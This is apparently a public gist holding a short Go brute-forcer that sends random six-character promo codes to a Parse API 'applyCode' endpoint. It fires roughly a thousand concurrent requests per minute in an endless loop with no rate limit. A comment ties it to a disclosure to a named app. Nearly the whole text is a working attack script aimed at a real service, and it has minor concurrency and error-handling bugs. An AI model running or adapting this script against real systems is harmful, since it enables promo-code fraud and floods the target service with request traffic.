simple golang bruteforcer

gistfile1.txt

//used something like this in a disclosure to sauceyapp.com regarding bruteforcing

package main

import (
	"bytes"
	"fmt"
	"io/ioutil"
	"math/rand"
	"net/http"
	"sync"
	"time"
)

func req() {

	const letterBytes = "abcdefghijklmnopqrstuvwxyz1234567890"

	b := make([]byte, 6)
	for i := range b {
		b[i] = letterBytes[rand.Intn(len(letterBytes))]
	}

	url := "https://api.parse.com/1/functions/applyCode"
	var jsonStr = []byte(`{"promoCode":"` + string(b[:6]) + `","_ApplicationId":"","_JavaScriptKey":"","_ClientVersion":"js1.3.4","_InstallationId":"","_SessionToken":""}`)
	req, err := http.NewRequest("POST", url, bytes.NewBuffer(jsonStr))
	req.Header.Set("X-Custom-Header", "myvalue")
	req.Header.Set("Content-Type", "application/json")

	client := &http.Client{}
	resp, err := client.Do(req)
	if err != nil {
		fmt.Println(err.Error())
	}
	defer resp.Body.Close()

	//fmt.Println("response Status:", resp.Status)
	//fmt.Println("response Headers:", resp.Header)
	body, _ := ioutil.ReadAll(resp.Body)
	fmt.Println("response Headers:", string(body))
}

func main() {
	for {
		wg := sync.WaitGroup{}
		for i := 1; i < 1000; i++ {
			go func() {
				wg.Add(1)
				defer wg.Done()
				req()
			}()
			// TODO(whoever)
			// https://godoc.org/?q=rate+limit
			// maybe wait here for say second/1000, use time.Ticker, but prefer to use a token bucket implementation
		}
		wg.Wait()
		time.Sleep(60 * time.Second)
	}
}